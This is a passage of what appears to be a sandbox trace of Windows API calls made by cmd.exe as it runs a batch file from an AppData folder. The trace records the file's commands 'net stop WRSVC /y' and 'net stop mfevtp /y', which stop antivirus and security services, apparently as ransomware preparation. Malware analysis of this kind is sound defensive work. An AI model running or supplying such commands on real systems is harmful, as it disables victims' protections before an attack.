(_String1="net", _String2="DEL") returned 10 [0215.380] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0215.380] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0215.380] _wcsicmp (_String1="net", _String2="CD") returned 11 [0215.380] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0215.380] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0215.380] _wcsicmp (_String1="net", _String2="REN") returned -4 [0215.380] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0215.380] _wcsicmp (_String1="net", _String2="SET") returned -5 [0215.380] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0215.380] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0215.380] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0215.380] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0215.380] _wcsicmp (_String1="net", _String2="MD") returned 1 [0215.380] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0215.380] _wcsicmp (_String1="net", _String2="RD") returned -4 [0215.380] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0215.380] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0215.380] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0215.380] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0215.380] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0215.380] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0215.380] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0215.380] _wcsicmp (_String1="net", _String2="VER") returned -8 [0215.380] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0215.380] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0215.380] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0215.381] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0215.381] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0215.381] _wcsicmp (_String1="net", _String2="START") returned -5 [0215.381] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0215.381] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0215.381] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0215.381] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0215.381] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0215.381] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0215.381] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0215.381] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0215.381] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0215.381] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0215.381] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0215.381] SetErrorMode (uMode=0x0) returned 0x1 [0215.381] GetProcessHeap () returned 0x3e0000 [0215.381] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0215.381] GetProcessHeap () returned 0x3e0000 [0215.381] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0215.382] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0215.382] GetProcessHeap () returned 0x3e0000 [0215.382] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0215.382] GetProcessHeap () returned 0x3e0000 [0215.382] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0215.382] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6d58, Size=0x122) returned 0x3f6d58 [0215.382] GetProcessHeap () returned 0x3e0000 [0215.382] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6d58) returned 0x122 [0215.382] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0215.382] GetProcessHeap () returned 0x3e0000 [0215.382] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f81f8 [0215.383] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f81f8, Size=0x76) returned 0x3f81f8 [0215.383] GetProcessHeap () returned 0x3e0000 [0215.383] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f81f8) returned 0x76 [0215.383] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0215.384] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0215.384] GetLastError () returned 0x2 [0215.384] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0215.384] GetLastError () returned 0x2 [0215.385] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0215.385] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0215.385] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0215.385] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0215.386] GetLastError () returned 0x2 [0215.386] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0215.386] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0215.386] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0215.387] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0215.387] SetErrorMode (uMode=0x0) returned 0x1 [0215.387] GetProcessHeap () returned 0x3e0000 [0215.387] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0215.387] GetProcessHeap () returned 0x3e0000 [0215.387] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0215.387] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0215.388] GetProcessHeap () returned 0x3e0000 [0215.388] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0215.388] GetProcessHeap () returned 0x3e0000 [0215.388] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0215.388] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7018, Size=0x122) returned 0x3f7018 [0215.388] GetProcessHeap () returned 0x3e0000 [0215.388] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7018) returned 0x122 [0215.388] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0215.388] GetProcessHeap () returned 0x3e0000 [0215.388] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7148 [0215.388] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7148, Size=0x76) returned 0x3f7148 [0215.388] GetProcessHeap () returned 0x3e0000 [0215.389] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7148) returned 0x76 [0215.389] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0215.389] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0215.389] GetLastError () returned 0x2 [0215.390] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0215.390] GetLastError () returned 0x2 [0215.390] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0215.391] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f8278 [0215.391] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0215.391] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0215.391] GetLastError () returned 0x2 [0215.392] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f8278 [0215.392] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0215.392] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0215.392] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0215.393] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0215.393] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0215.393] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0215.393] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop WRSVC /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop WRSVC /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop WRSVC /y", lpProcessInformation=0x3beae0*(hProcess=0x74, hThread=0x78, dwProcessId=0x7d4, dwThreadId=0x358)) returned 1 [0215.397] CloseHandle (hObject=0x78) returned 1 [0215.397] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0215.397] GetProcessHeap () returned 0x3e0000 [0215.397] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0215.397] GetEnvironmentStringsW () returned 0x3f8408* [0215.397] GetProcessHeap () returned 0x3e0000 [0215.397] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0215.398] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0215.398] WaitForSingleObject (hHandle=0x74, dwMilliseconds=0xffffffff) returned 0x0 [0215.539] GetExitCodeProcess (in: hProcess=0x74, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0215.539] CloseHandle (hObject=0x74) returned 1 [0215.539] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0215.540] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0215.540] GetProcessHeap () returned 0x3e0000 [0215.540] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0215.540] GetEnvironmentStringsW () returned 0x3f8408* [0215.540] GetProcessHeap () returned 0x3e0000 [0215.540] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0215.540] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0215.540] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0215.540] GetProcessHeap () returned 0x3e0000 [0215.540] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0215.540] GetEnvironmentStringsW () returned 0x3f8408* [0215.540] GetProcessHeap () returned 0x3e0000 [0215.540] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0215.540] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0215.540] GetProcessHeap () returned 0x3e0000 [0215.540] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0215.541] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0215.541] _get_osfhandle (_FileHandle=1) returned 0x264 [0215.541] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0215.541] _get_osfhandle (_FileHandle=1) returned 0x264 [0215.541] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0215.541] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0215.541] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0215.541] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0215.541] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0215.541] SetConsoleInputExeNameW () returned 0x1 [0215.541] GetConsoleOutputCP () returned 0x1b5 [0215.542] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0215.542] SetThreadUILanguage (LangId=0x0) returned 0x409 [0215.542] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0215.542] _open_osfhandle (_OSFileHandle=0x74, _Flags=8) returned 3 [0215.542] _get_osfhandle (_FileHandle=3) returned 0x74 [0215.542] SetFilePointer (in: hFile=0x74, lDistanceToMove=5640, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1608 [0215.542] GetProcessHeap () returned 0x3e0000 [0215.542] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0215.542] GetProcessHeap () returned 0x3e0000 [0215.542] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0215.542] GetProcessHeap () returned 0x3e0000 [0215.542] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0215.542] GetProcessHeap () returned 0x3e0000 [0215.542] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0215.542] GetProcessHeap () returned 0x3e0000 [0215.542] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3e1290 | out: hHeap=0x3e0000) returned 1 [0215.542] GetProcessHeap () returned 0x3e0000 [0215.542] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0215.542] GetProcessHeap () returned 0x3e0000 [0215.542] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0215.542] GetProcessHeap () returned 0x3e0000 [0215.542] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0215.542] GetProcessHeap () returned 0x3e0000 [0215.542] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0215.542] GetProcessHeap () returned 0x3e0000 [0215.542] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0215.542] GetProcessHeap () returned 0x3e0000 [0215.542] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3ef4b0 | out: hHeap=0x3e0000) returned 1 [0215.543] GetProcessHeap () returned 0x3e0000 [0215.543] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0215.543] GetProcessHeap () returned 0x3e0000 [0215.543] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0215.543] _get_osfhandle (_FileHandle=3) returned 0x74 [0215.543] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1608 [0215.543] ReadFile (in: hFile=0x74, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x2b9, lpOverlapped=0x0) returned 1 [0215.543] SetFilePointer (in: hFile=0x74, lDistanceToMove=5660, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x161c [0215.543] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=20, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop mfevtp /y\r\nPOINT /y\r\n\n/y\r\n/y\r\n¥ /y\r\n\r\n¥ /y\r\nures\r\nnded\r\n") returned 20 [0215.543] _get_osfhandle (_FileHandle=3) returned 0x74 [0215.543] GetFileType (hFile=0x74) returned 0x1 [0215.543] _get_osfhandle (_FileHandle=3) returned 0x74 [0215.543] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x161c [0215.543] GetProcessHeap () returned 0x3e0000 [0215.543] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3ffad8 [0215.544] GetProcessHeap () returned 0x3e0000 [0215.544] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3ffad8 | out: hHeap=0x3e0000) returned 1 [0215.547] _tell (_FileHandle=3) returned 5660 [0215.547] _close (_FileHandle=3) returned 0 [0215.547] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0215.547] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0215.547] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0215.547] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0215.547] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0215.547] _wcsicmp (_String1="net", _String2="CD") returned 11 [0215.547] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0215.547] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0215.547] _wcsicmp (_String1="net", _String2="REN") returned -4 [0215.547] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0215.547] _wcsicmp (_String1="net", _String2="SET") returned -5 [0215.547] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0215.547] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0215.547] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0215.547] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0215.547] _wcsicmp (_String1="net", _String2="MD") returned 1 [0215.548] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0215.548] _wcsicmp (_String1="net", _String2="RD") returned -4 [0215.548] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0215.548] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0215.548] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0215.548] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0215.548] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0215.548] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0215.548] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0215.548] _wcsicmp (_String1="net", _String2="VER") returned -8 [0215.548] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0215.548] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0215.548] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0215.548] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0215.548] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0215.548] _wcsicmp (_String1="net", _String2="START") returned -5 [0215.548] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0215.548] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0215.548] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0215.548] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0215.548] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0215.548] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0215.548] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0215.548] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0215.548] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0215.548] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0215.549] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0215.549] SetErrorMode (uMode=0x0) returned 0x1 [0215.549] GetProcessHeap () returned 0x3e0000 [0215.549] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0215.549] GetProcessHeap () returned 0x3e0000 [0215.549] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0215.549] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0215.549] GetProcessHeap () returned 0x3e0000 [0215.549] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0215.549] GetProcessHeap () returned 0x3e0000 [0215.549] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0215.550] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6d58, Size=0x122) returned 0x3f6d58 [0215.550] GetProcessHeap () returned 0x3e0000 [0215.550] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6d58) returned 0x122 [0215.550] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0215.550] GetProcessHeap () returned 0x3e0000 [0215.550] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f81f8 [0215.550] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f81f8, Size=0x76) returned 0x3f81f8 [0215.550] GetProcessHeap () returned 0x3e0000 [0215.550] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f81f8) returned 0x76 [0215.550] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0215.551] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0215.551] GetLastError () returned 0x2 [0215.551] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0215.552] GetLastError () returned 0x2 [0215.552] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0215.552] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0215.552] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0215.553] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0215.553] GetLastError () returned 0x2 [0215.553] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0215.553] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0215.554] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0215.554] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0215.554] SetErrorMode (uMode=0x0) returned 0x1 [0215.554] GetProcessHeap () returned 0x3e0000 [0215.554] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0215.554] GetProcessHeap () returned 0x3e0000 [0215.554] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0215.555] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0215.555] GetProcessHeap () returned 0x3e0000 [0215.555] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0215.555] GetProcessHeap () returned 0x3e0000 [0215.555] 